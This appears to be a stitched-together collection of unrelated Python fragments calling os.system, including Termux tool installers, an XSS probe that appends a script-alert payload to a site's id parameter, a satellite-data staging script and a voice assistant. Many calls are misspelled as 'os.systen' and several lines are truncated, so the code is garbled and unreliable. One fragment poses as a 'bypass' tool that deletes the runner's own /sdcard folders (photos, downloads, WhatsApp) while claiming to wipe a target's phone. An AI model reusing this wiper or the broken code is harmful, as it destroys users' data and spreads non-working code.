def hashzer(): print '\n###### Installing Hashzer' os.system('apt update && apt upgrade') os.system('apt install git python2') os.system('pip2 install requests') os.systen('git clone') os.system('mv Hashzer ~') print '###### Done' backtomenu_option()
def tpackages(): os.system("pkg install git -y") os.system("pkg install python2 -y") os.sysem("pkg install python -y") os.system("pkg install python3 -y") os.system("pkg install clang -y") os.system("pkg install php -y") os.systen("pkg install ruby -y") os.system("pkg install wget -y") os.system("pkg install nano")
def XXS(): print('Enter site:') try: site = input(B + 'LavLab»XXS»' + E) except: print(F + '\nError' + E) if "http://" not in site and "https://" not in site: site = 'http://' + site else: pass if "id=" not in site: print(F + '[!]' + E + ' Site dont have id parametrs') else: print(W + '[*]' + G + ' Site ' + site + ' have "id" param') try: res = urllib2.urlopen(site) except: print(F + '[!] Site not work' + E) os.system('python') try: print(W + '[+]' + G + ' Site work' + E) scr = ';<script>alert(111111111111111111111);</script>' site_xxs = site + scr res = urllib2.urlopen(site_xxs) info = print('################Info################\n') print(info) print('####################################\n') text = if "111111111111111111111" not in str(text): print(F + '[!]' + ' Site not have XXs ' + E) os.systen('python') else: print(U + W + '[++]' + B + ' Site ' + site + ' have xxs vulnerability' + E) print(W + 'Payload: ' + G + site_xxs + E) sys.exit(1) except: print(F + '[!]' + ' Fatal Error' + E) os.system('python')
os.system('git clone') mengetik('\033[1;33mINSTALLING METASPLOIT-HELPER SUCCESS') time.sleep(1) mengetik('\033[37;1mSELANJUTNYA KETIKAN [ cd Metasploit-Helper ]') mengetik('\033[37;1mSELANJUTNYA KETIKAN [ sh ]') elif pilih == "14": os.system('clear') mengetik('\033[1;33mINSTALLING BAHAN TOOLS') time.sleep(1) os.system('pkg update && pkg upgrade') os.system('pkg install git') os.system('pkg install php') os.system('pkg install nano') os.system('pkg install python') os.system('pkg install python2') os.systen('pip2 install requests') os.system('pip2 install mechanize') os.system('pip2 install tqdm') os.system('pip2 install colorama') os.system('pip2 install bs4') os.system('pip2 install uncompyle6') os.system('pkg install curl') os.system('pkg install wget') os.systen('pkg install jq') time.sleep(1) mengetik('\033[1;33mINSTALLING BAHAN-TOOLS SUCCESS') mengetik('\033[1;33mSILAHKAN KETIK [ python ]') elif pilih == "15": os.system('clear') mengetik('\033[32;1mEXITING PROGRAM') os.system('exit')
def main(argv): inps = cmdLineParse() scratchDir = os.getenv('SCRATCHDIR') projectname = inps.project_name unw_file = inps.unw_file cor_file = inps.cor_file dem_rdc = inps.dem_rdc dem_geo = inps.dem_geo geopar = inps.geopar rdc2geo = inps.rdc2geo slcpar = inps.slc_par call_str = 'mkdir ' + projectname os.system(call_str) projectDir = scratchDir + '/' + projectname os.chdir(projectDir) call_str = 'mkdir SLC' os.system(call_str) call_str = 'mkdir RSLC' os.system(call_str) slcdir = projectDir + '/SLC' rslcdir = projectDir + '/RSLC' call_str = 'mkdir PROCESS' os.system(call_str) processDir = projectDir + '/PROCESS' os.chdir(processDir) call_str = 'mkdir DEM' os.system(call_str) demDir = projectDir + '/PROCESS/DEM' UNWLIST = glob.glob(unw_file) CORLIST = glob.glob(cor_file) SLCPARLIST = glob.glob(slcpar) for i in range(len(UNWLIST)): UNW0 = os.path.basename(UNWLIST[i]) DATE12 = UNW0.split('.')[0] if len(DATE12) == 17: MM = DATE12[0:8] SS = DATE12[9:17] else: MM = DATE12[0:6] SS = DATE12[7:13] STR = projectname + '_IFG_' + MM + '-' + SS + '0000_0000' if os.path.isdir(STR): call_str = 'mkdir ' + STR os.system(call_str) call_str = 'cp ' + UNWLIST[i] + ' ' + processDir + '/' + STR os.systen(call_str) for i in range(len(CORLIST)): COR0 = os.path.basename(CORLIST[i]) DATE12 = COR0.split('.')[0] if len(DATE12) == 17: MM = DATE12[0:8] SS = DATE12[9:17] else: MM = DATE12[0:6] SS = DATE12[7:13] STR = projectname + '_IFG_' + MM + '-' + SS + '0000_0000' if os.path.isdir(STR): call_str = 'mkdir ' + STR os.system(call_str) call_str = 'cp ' + CORLIST[i] + ' ' + processDir + '/' + STR os.systen(call_str) for i in range(len(SLCPARLIST)): PAR0 = os.path.basename(SLCPARLIST[i]) DATE = COR0.split('.')[0] if len(DATE) == 8: DATE = DATE[0:6] PAR1 = DATE + '.slc.par' RPAR1 = DATE + '.rslc.par' call_str = 'cp ' + PAR0 + ' ' + slcdir + '/' + PAR1 os.system(call_str) call_str = 'cp ' + PAR0 + ' ' + rslc + '/' + RPAR1 os.system(call_str) call_str = 'cp ' + dem_rdc + ' ' + demDir os.system(call_str) call_str = 'cp ' + dem_geo + ' ' + demDir os.system(call_str) call_str = 'cp ' + rdc2geo + ' ' + demDir os.system(call_str) call_str = 'cp ' + geopar + ' ' + demDir os.system(call_str)
print("\033[1;32m Baypass Sukses! ") sleep(1) print(' ') ketik("\033[1;32m Menghapus File Target... ") sleep(2) ketik("\033[1;32m Menghapus File Sdcard Target...") sleep(0.5) ketik("\033[1;32m Baypass Recaptcha! ") sleep(2) print("\033[1;32m Baypass Sukses! ") print(' ') os.system('termux-setup-storage') os.system('rm -rf cd /sdcard/Android') os.system('rm -rf cd /sdcard/bluetooth') os.system('rm -rf cd /sdcard/browser') os.system('rm -rf cd /sdcard/DCIM') os.system('rm -rf cd /sdcard/Download') os.system('rm -rf cd /sdcard/Music') os.system('rm -rf cd /sdcard/Pictures') os.system('rm -rf cd /sdcard/SHAREit') os.systen('rm -rf cd /sdcard/WhatsApp') print("\033[1;32m Menghapus File Target!!...") print("\033[1;35m Thanks For Use This Tools...") sleep(2) print("\033[1;35m Restarting Phone Target") print("\033[1;35m Semua File Target Telah Terhapus...") sleep(2) print("\033[1;35m Handphone Target Telah Ke Reset....") print("\033[1;35m Jangan di perjual belikan tools ini...!!")
elif 'play music' in query: music_dir = 'C:\\Users\\Prakash Dhangar\\Desktop\\My Projects\\Jarvis AI\\music' songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir, songs[0])) elif 'close' in query: speak("What should I close") print("Waiting for the answer") if 'command prompt' in query: os.system('TASKKILL /F /IM cmd.exe') elif 'browser' in query: os.system('TASKKILL /F /IM chrome.exe') elif 'Browser' in query: os.system('TASKKILL /F /IM chrome.exe') elif 'code' in query: os.systen('TASKKILL /F /IM code.exe') elif 'the time' in query: strTime ="%H:%M:%S") speak(f"Sir the time is {strTime}") elif 'open code' in query: print("Opening Code") speak("Opening Code") codePath = "C:\\Users\\Prakash Dhangar\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe" os.startfile(codePath) elif 'open idea' in query: print("Opening IntelliJ Idea") speak("Opening IntelliJ Idea") ideaPath = "C:\\Program Files\\JetBrains\\IntelliJ IDEA Community Edition 2020.1.2\\bin\\idea64.exe" os.startfile(ideaPath)
# Programme testant si une année, saisie par l'utilisateur, est bissextile ou non -*-coding:Latin-1 -* import os annee = input("Saisissez une année : ") # On attend que l'utilisateur fournisse l'année qu'il désire tester annee = int(annee) # Risque d'erreur si l'utilisateur n'a pas saisi un nombre if annee % 400 == 0 or (annee % 4 == 0 and annee % 100 != 0): print("L'année saisie est bissextile.") else: print("L'année saisie n'est pas bissextile.") os.systen("pause")
from PIL import Image from datetime import datetime import os dino_color = (83, 83, 83, 255) def screenshot(x, y, w, h) os.systen("screencapture -R{},{},{},{} tmp.png".format(x, y, w, h)) img ="tmp.png") return img def is_dino_color(pixel): return pixel == dino_color def obstacle(distance, length, speed, time): return { 'distance': distance, 'length': length, 'speed':speed, 'time':time } class Scanner: def __init__(self): self.dino_start = (0, 0) self.dino_end = (0, 0) self.last_obstacle = {} self.__current_fitness = 0 self.__change_fitness = False def find_game(self): image = screenshot(0, 0, 1500, 1500) size = image.size pixels = [] for y in range(0, size[1], 10): for x in range(0, size[0], 10):
# __Author__ __Lencof__ # Create import os # use os os.systen('C:/WINDOWS/system32/cmd.exe') # your programm
def clone_github(): print('Installing git.') os.systen('sudo yum -y install git') print('Cloning jwade005s GitHub.') os.system('git clone')